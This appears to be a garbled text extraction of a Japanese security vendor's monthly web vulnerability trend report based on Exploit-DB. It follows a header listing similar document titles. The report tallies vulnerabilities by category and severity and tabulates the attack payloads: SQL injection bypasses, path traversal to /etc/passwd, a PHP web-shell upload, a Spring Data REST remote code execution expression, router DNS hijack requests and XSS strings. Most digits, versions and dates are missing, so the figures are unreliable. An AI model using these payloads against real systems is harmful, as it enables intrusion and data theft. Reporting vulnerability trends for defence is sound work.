最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年

Similar documents
サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site

最新 Web トレンドレポート (06.04) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05

最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム

最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06


サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センタ


最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5

96 8 PHPlot 1. ( 8.1) 4 1: // 2: // $_SERVER[ HTTP_REFERER ]... 3: // $_SERVER[ HTTP_USER_AGENT ]... 4: // $_SERVER[ REMOTE_ADDR ]... ( ) 5: // $_SERV

PowerPoint Presentation

¥Í¥Ã¥È¥ï¡¼¥¯¥×¥í¥°¥é¥ß¥ó¥°ÆÃÏÀ

5-5_arai_JPNICSecSemi_XssCsrf_CM_ PDF

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

EDB-Report 最新Web脆弱性トレンドレポート(07.) 07..0~07.. Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 0


Flash Player ローカル設定マネージャー

最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開さ

25 About what prevent spoofing of misusing a session information

サマリー EDB-Report 最新 Web トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチー

shio_ PDF

別紙 年第 3 四半期脆弱性対策情報データベース JVN ipedia の登録状況 ( 詳細 ) 1. 脆弱性対策情報の登録状況 年第 3 四半期に登録した脆弱性の種類別件数図 8 のグラフは JVN ipedia へ 2012 年第 3 四半期に登録した脆弱性対策情

untitled

Microsoft PowerPoint pptx

untitled

Microsoft PowerPoint pptx

2011 年第 3 四半期脆弱性対策情報データベース JVN ipedia の登録状況 ( 詳細 ) 1. 脆弱性対策情報の登録状況 1.1 今四半期に登録した脆弱性の種類別件数 す 別紙 2 共通脆弱性タイプ一覧 CWE ( *12) は 脆弱性の種類を識別するための共通の脆弱性タイプの一覧で C

Oracle Application Server 10g( )インストール手順書

Epson Print Admin

WordPress Ktai Style Ktai Entry 18 Mac 18

自己紹介 はせがわようすけ ネットエージェント株式会社 株式会社セキュアスカイ テクノロジー技術顧問 Microsoft MVP for Consumer Security Oct

マイクロソフトのWebブラウザのいままでとこれから

IM-SecureBlocker

JP-Secure_labs_Report_Vol.02

WIDE 1

Web のクライアントサーバモデル

Microsoft PowerPoint - webapp.ppt [互換モード]

<Documents Title Here>

2

Web apache

Webサービス実証実験プロジェクト デモアプリ発表資料

untitled

第3回_416.ppt



Windows と Linux のセキュリティ: 噂の真相


Teradici Corporation # Canada Way, Burnaby, BC V5G 4X8 Canada p f Teradici Corporation Teradi

Oracle Application Server 10g(9

Windows Oracle -Web - Copyright Oracle Corporation Japan, All rights reserved.

Microsoft PowerPoint ppt [互換モード]

Oracle Application Server 10g(9

カスペルスキー アンチウイルス 2011 for Mac

(O) (N) (V) (N) kuins-pptp (N) 2

VMware View Persona Management

CAS Yale Open Source software Authentication Authorization (nu-cas) Backend Database Authentication Authorization Powered by A

2 Java 35 Java Java HTML/CSS/JavaScript Java Java JSP MySQL Java 9:00 17:30 12:00 13: 項目 日数 時間 習得目標スキル Java 2 15 Web Java Java J

<Documents Title Here>

wide94.dvi

Windows2000 Edge Components V Edge Components V Java Edge Components

脆弱性対策情報データベース JVN ipedia に関する活動報告レポート [2019 年第 3 四半期 (7 月 ~9 月 )] 脆弱性対策情報データベース JVN ipedia に関する活動報告レポートについて 本レポートでは 2019 年 7 月 1 日から 2019 年 9 月 30 日まで

<Documents Title Here>

CMS入門

FileMaker Server 9 Getting Started Guide

nopcommerce Adobe Flash ( 1 ) 1 nopcommerce 2.2 ( [5, p.3-4] )

意外と簡単!?

チェックしておきたいぜい弱性情報2009< >

Web XXX.XXX.XXX.XXX - - [02/May/2010:12:52: ] "GET /url/url2/page2.htm HTTP/1.1" " "(compatibl

CDNext ガイドライン:アクセスログ提供機能について

評価 評価 C AAA AA A B C 脆弱性 0 個 低が 1 種類以上中が 1 種類中が 2 種類 高が 1 種類以上もしくは中が 3 種類以上 総評 Web アプリケーションに関するセキュリティスキャンを実施した結果 対象のアプリケーションからは 重大度 高 中 低 の問題と 情報 が検出さ

脆弱性対策情報データベース JVN ipedia に関する活動報告レポート [2013 年第 3 四半期 (7 月 ~9 月 )] 脆弱性対策情報データベース JVN ipedia に関する活動報告レポートについて 本レポートでは 2013 年 7 月 1 日から2013 年 9 月 30 日までの

FileMaker Server 9 Getting Started Guide

Phishing対策のためのMutualアクセス認証 〜 MutualTestFoxの公開について 〜

<Documents Title Here>

Epson Print Admin

ウェブデザイン技能検定 1 級実技 平成 28 年度 第 4 回 ウェブデザイン技能検定 1 級 実技試験概要 試験にあたっての注意事項 試験者は本試験の留意事項 注意事項に留意して作業を行うこと ペーパー実技試験は 課題 1 から 5 までの 5 課題を 60 分間で行うこと 作業実技試験は 課題

Si-R180 ご利用にあたって

I httpd School of Information Science, Japan Advanced Institute of Science and Technology

untitled

Vol. 9 No. 2 DNS. DNS IP.... leopard.loc. DNS. Mac OS X Server. Web Mac OS X Server Mac OS X Server.. DNS DNS DNS example.com DNS

ohp.mgp

脆弱性対策情報データベース JVN ipedia に関する活動報告レポート [2019 年第 1 四半期 (1 月 ~3 月 )] 脆弱性対策情報データベース JVN ipedia に関する活動報告レポートについて 本レポートでは 2019 年 1 月 1 日から 2019 年 3 月 31 日まで

itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 E

11 Windows XP IP WEP (Web )

内容 ( 演習 1) 脆弱性の原理解説 基礎知識 脆弱性の発見方法 演習 1: 意図しない命令の実行 演習解説 2

Do No Track 実装ガイド

CA Federation ご紹介資料


Microsoft Word - sugiyama.doc

main.dvi

HTTPの 規 格

Cisco® ASA シリーズルーター向けDigiCert® 統合ガイド

目的 概要 全体像 概念図 用語の定義 用語 説明 用語 説明 用語 説明 用語 説明 参考資料

54 5 PHP Web hellow.php 1:<?php 2: echo "Hellow, PHP!Y=n"; 3:?> echo PHP C 2: printf("hellow, PHP!Y=n"); PHP (php) $ php hellow.php Hellow, PHP! 5.1.2

TCP/IP Internet Week 2002 [2002/12/17] Japan Registry Service Co., Ltd. No.3 Internet Week 2002 [2002/12/17] Japan Registry Service Co., Ltd. No.4 2

脆弱性対策情報データベース JVN ipedia に関する活動報告レポート [2013 年第 2 四半期 (4 月 ~6 月 )] 脆弱性対策情報データベース JVN ipedia に関する活動報告レポートについて 本レポートでは 2013 年 4 月 1 日から2013 年 6 月 30 日までの

[投影版]見つけられやすい脆弱性とウェブフレームワークに求められるセキュリティ対策_

Transcription:

08.0

最新 Web 脆弱性トレンドレポート (08.0) 08.0.0~08.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年 月に公開された Exploit DB の脆弱性報告件数は 6 件でした こので最も多くの脆弱性が公開された攻撃は SQL (SQL インジェクション ) です 特に Joomla Component で つの脆弱性が公開されました こので 注目すべきことは "" <.0.0 - Release 90"" 脆弱性です 当脆弱性は それぞれ Command, File Upload, SQL 脆弱性を利用して攻撃が行なわれました このように様々な脆弱性を利用した攻撃に対しては注意する必要があります 当脆弱性を予防するためには 最新パッチとセキュアコーディングをおすすめします しかし 完璧なセキュアコーディングは不可能であり 持続的にセキュリティを維持するためにはウェブアプリケーションファイアウォールを活用した深層防御 (Defense indepth) 実装を考慮しなければなりません. 脆弱性別件数脆弱性カテゴリ 件数 6 8 취약점脆弱性別件数별보고개수 サービス拒否攻撃 (Denial of Service) クッキーセッション (Cookie Session) ローカルファイルインクルード (Local File Inclusion) 6 ファイルアップロード (File Upload) コマンドインジェクション (Command ) リモートDNS 変更 (Remote DNS Change) ディレクトリトラバーサル (Directory Traversal) クロスサイトスクリプティング (Cross Site Scripting:XSS) SQL インジェクション (SQL ) 合計 6 0 0 Denial of Service Cookie Session Weakness LFI File Upload Command Remote DNS Change Directory Traversal XSS Remote DNS Change. 危険度別件数 危険度別件数 危険度 件数 割合 早急対応要 0 8.6% 高 9.6% 6.9% 合計 6 00.00% 0 早急対応要 高. 攻撃実行の難易度別件数 難易度 件数 割合 難.69%.% 易 80.% 合計 6 00.00% 9 攻撃実行の難易度別件数. 主なソフトウェア別脆弱性発生件数 難 ソフトウェア名 件数 Server 易 uwsgi MyBB Plugin Last User's Threads in Profile Plugin Bacula-Web W00R/A0/w09r TextPattern XenForo Wordpress Plugin Site Editor Redaxo CMS Addon MyEvents Plugin Relevanssi Advantech WebAccess W08R v 主なソフトウェア別脆弱性発生件数 SecurEnvoy SecurMail W6R Tuleap FH0/A00 Firmware Plugin Duplicator Spring Data REST 合計 6 Server uwsgi MyBB Plugin Last User's Threads in Profile Plugin Bacula-Web W00R/A0/w09r TextPattern XenForo Wordpress Plugin Site Editor Redaxo CMS Addon MyEvents Plugin Relevanssi Advantech WebAccess W08R v SecurEnvoy SecurMail W6R Tuleap FH0/A00 Firmware Plugin Duplicator

最新 Web 脆弱性トレンドレポート (08.0) 08.0.0~08.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 日付き EDB 番号脆弱性カテゴリ攻撃難危険度脆弱性名攻撃コード対象プログラム対象環境 POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. 08-0-0 0 SQL 易高 KHTML, like Gecko Chrome/6.0.9. Safari/. < 0.9.a - Authentication Bypass Content-Length: < 0.9.a username= > &password=%0a 08-0-0 Directory Traversal 易 uwsgi <.0. - Directory Traversal /..%f..%f..%f..%f..%f..%f..%fetc/passwd uwsgi uwsgi <.0. POST / HTTP/. 0.0.00.:00 User-Agent: curl/.9.0 Content-Length: Expect: 00-continue 08-0-0 0 Command 易早急対応要 <.0.0 - Release 90 Content-Type: multipart/form-data; boundary=------------------------ - Command / File 096f69cccd --------------------------096f69cccd Content-Disposition: form-data; name="file"; filename="pfile.php" Content-Type: application/octet-stream <.0.0 - Release 90 <?php echo passthru($_get['cmd']);?> --------------------------096f69cccd-- POST / HTTP/. 0.0.00.:00 User-Agent: curl/.9.0 Content-Length: 08-0-0 0 File Upload 早急対応要 Expect: 00-continue <.0.0 - Release 90 Content-Type: multipart/form-data; boundary=------------------------ - Command / File 096f69cccd <.0.0 - Release 90 --------------------------096f69cccd Content-Disposition: form-data; name="name" anyname.php --------------------------096f69cccd POST /actions/vote_channel.php HTTP/. 0.0.00.:00 User-Agent: curl/.9.0 Content-Length: 08-0-0 0 SQL 易早急対応要 Expect: 00-continue <.0.0 - Release 90 Content-Type: multipart/form-data; boundary=------------------------ - Command / File 096f69cccd <.0.0 - Release 90 channelid=channelid=-benchmark(00000000, rand()) mode=emailexists&email=' or ''=' mode=userexists&username=' or ''=' 08-0-0 6 SQL 易早急対応要 Redaxo CMS Addon MyEvents.. - SQL /redaxo/index.php?page=myevents/event_add&myevents_id=' or ''=' Redaxo CMS Redaxo CMS Addon MyEvents Addon MyEvents.. POST /login HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. 08-0-0 6 SQL 易高 0.9.0c - Authentication Bypass KHTML, like Gecko Chrome/6.0.9. Safari/. Content-Length: 0.9.0c username= > &password=%0a /jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&ord erby=jobid&jobs_per_page=&pool_id=%%0union%0all%0se 08-0-09 SQL 難早急対応要 Bacula-Web < 8.0.0-rc - SQL LECT%0@@version%CNULL%CNULL%CNULL%CNULL%CNULL% CNULL%CNULL%CNULL%CNULL%CNULL%CNULL%CNULL%CNU LL% HTTP/. Bacula-Web Bacula-Web < 8.0.0-rc 08-0- SQL 易早急対応要 TextPattern.6. - 'qty' SQL /textpattern/textpattern/index.php?event=link&step=link_change_pageby &qty=0&_txp_token=baa0ba8d68ef80bb9dd9d8 TextPattern TextPattern.6. 08-0- 8 Directory Traversal 易 08-0- 8 XSS 易高 Advantech WebAccess < 8. - Directory Traversal / Remote Code Execution SecurEnvoy SecurMail 9..0 - Multiple Vulnerabilities..\\..\\windows\\system\\calc.exe POST /secupload/upload.aspx HTTP/. Content-Disposition: form-data; name="messageid" User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. KHTML, like Gecko Chrome/6.0.9. Safari/. Content-Type: multipart/form-data; boundary=--------8988 Content-Length: 09 Advantech WebAccess SecurEnvoy SecurMail Advantech WebAccess < 8. SecurEnvoy SecurMail 9..0 name=""><script>alert&#0;&apos;xss&apos;&#;<&#;script>"

最新 Web 脆弱性トレンドレポート (08.0) 08.0.0~08.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 日付き EDB 番号 脆弱性カテゴリ 攻撃難 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 POST /plugins/tracker/?tracker=6 HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 6.0; Windows NT.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Length: 8 08-0- 86 SQL 難早急対応要 08-0- 88 XSS 易高 Tuleap 9..99.89 - Blind SQL Plugin Duplicator.. - Cross-Site Scripting Tuleap report=&criteria%b0%d=&criteria%b89%d=&criteria%b9 Tuleap 9..99.89 %D%Bvalues%D= &criteria%b9%d%bvalues%d%b%d=&criteria%b99%d%bv alues%d= &criteria%b99%d%bvalues%d%b%d=(select(0)from(select(sleep( )))a)/**/ &additional_criteria%bcomment%d=&tracker_query_submit= POST /wp-content/plugins/duplicator/installer/build/view.step.php HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. KHTML, like Gecko Chrome/6.0.9. Safari/. Plugin Duplicator Plugin Duplicator.. Content-Length: 9 json='a';};document.write(alert(document.cookie));myviewmodel%dfunct ion(){this.status%d'' 08-0- 89 Command 早急対応要 POST / HTTP/. Host : User-Agent: Mozilla/.0 Content-Type : application/json-patch+json Spring Data REST Spring Data REST <.6.9 (Ingalls <.6.9 (Ingalls SR9) /.0. (Kay SR) - PATCH Spring Data REST T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRunti SR9) /.0. (Kay Request Remote Code Execution me().exec((t(java.lang.system).getproperty(\\\"os.name\\\").tolowercase SR) ().contains(\\\"win\\\")?\\\"cmd \\\"+" + SLASH + "+\\\"c \\\"":\\\"\\\")+%s).getinputstream(),t(org.springframework.web.context. request.requestcontextholder).currentrequestattributes().getresponse(). getoutputstream()).x 08-0- 6 Denial of Service 易高 08-0- 9 XSS 易高 POST / HTTP/. XenForo - CSS Loader Denial of Host : Service User-Agent : random.choice(headers_useragents) Content-Type : application/json\ MyBB Plugin Last User's Threads in Profile Plugin. - Persistent <p """><SCRIPT>alert("XSS")</SCRIPT>"> Cross-Site Scripting XenForo XenForo MyBB Plugin Last MyBB Plugin Last User's Threads in User's Threads in Profile Plugin Profile Plugin. 08-0- 0 LFI 易高 POST /wp-content/plugins/siteeditor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.ph p? HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. Wordpress Plugin Site Editor.. KHTML, like Gecko Chrome/6.0.9. Safari/. - Local File Inclusion Content-Length: Wordpress Wordpress Plugin Site Editor Plugin Site Editor.. ajax_path=/etc/passwd 08-0- 6 File Upload 易早急対応要 - beats_uploader Unauthenticated Arbitrary File Upload (Metasploit) POST / HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) Content-Type: multipart/form-data; boundary=#{post_data.bound} Content-Length: 8 -----------------------------dd009908f Content-Disposition: form-data; name="file"; filename="filename.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------dd009908f-- 08-0-8 0 Directory Traversal 易 POST /rpc/set_all HTTP/. User-Agent: Mozilla/.0 (Macintosh; Intel Mac OS X 0.; rv:.0) Gecko/0000 Firefox/.0 Server.0.-8. - Directory Traversal Content-Type: application/x-www-form-urlencoded Content-Length: Server Server.0.-8. 08-0-8 XSS 易高 contentdir=/../ POST /rpc/set_all HTTP/. User-Agent: Mozilla/.0 (Macintosh; Intel Mac OS X 0.; rv:.0) Gecko/0000 Firefox/.0 Server.0.-8. - Persistent Cross-Site Scripting Content-Type: application/x-www-form-urlencoded Content-Length: 9 Server Server.0.-8. friendlyname=<script>alert()</script>

最新 Web 脆弱性トレンドレポート (08.0) 08.0.0~08.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 日付き EDB 番号脆弱性カテゴリ攻撃難危険度脆弱性名攻撃コード対象プログラム対象環境 08-0-0 66 XSS 易高 /wp-admin/optionsgeneral.php?page=relevanssi%frelevanssi.php&tab='><script>var+x+ Plugin Relevanssi.0. Plugin Relevanssi - Reflected Cross-Site Scripting %D+String(%FXSS%F)%Bx+%D+x.substring(%C+x.length- Plugin Relevanssi.0. )%Balert(x)<%FSCRIPT><BR+ 08-0-0 Cookie Session Weakness Remote DNS Change 易 W08R v /goform/advsetdns?go=wan_dns.asp&reboottag=&dsen=&dnsen=.0.8 - Cookie Session on&ds=8.8.8.8&ds=0.0.00." >/dev/null Weakness Remote DNS Change W08R v W08R v.0.8 08-0-0 Directory Traversal 早急対応要... - Remote Code Execution POST /oscommerce-.../catalog/install/install.php HTTP/. Host : User-Agent : Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. KHTML, like Gecko Chrome/6.0.9. Safari/. Content-Type : application/x-www-form-urlencoded; charset=utf-8... \'); system("ls"); /* 08-0-0 Remote DNS Change 易 W6R.0.0 - Remote DNS Change goform/advsetdns?go=wan_dns.asp&reboottag=&dsen=&dnsen=o n&ds=8.8.8.8&ds=0.0.0.00" >/dev/null W6R W6R.0.0 08-0-0 80 Remote DNS Change 易 08-0-0 8 Remote DNS Change 易 W00R/A0/w09r v.0.6_en - Remote DNS Change (PoC) FH0/A00 Firmware v.0.68_en - Remote DNS Change goform/advsetdns?go=wan_dns.asp&reboottag=&dsen=&dnsen=o n&ds=8.8.8.8&ds=0.0.0.00" >/dev/null goform/advsetdns?go=wan_dns.asp&reboottag=&dsen=&dnsen=o n&ds=8.8.8.8&ds=0.0.0.00" >/dev/null W00R/A0/w W00R/A0/w 09r Wireless 09r Wireless Router Router v.0.6_en FH0/A00 FH0/A00 Firmware Firmware v.0.68_en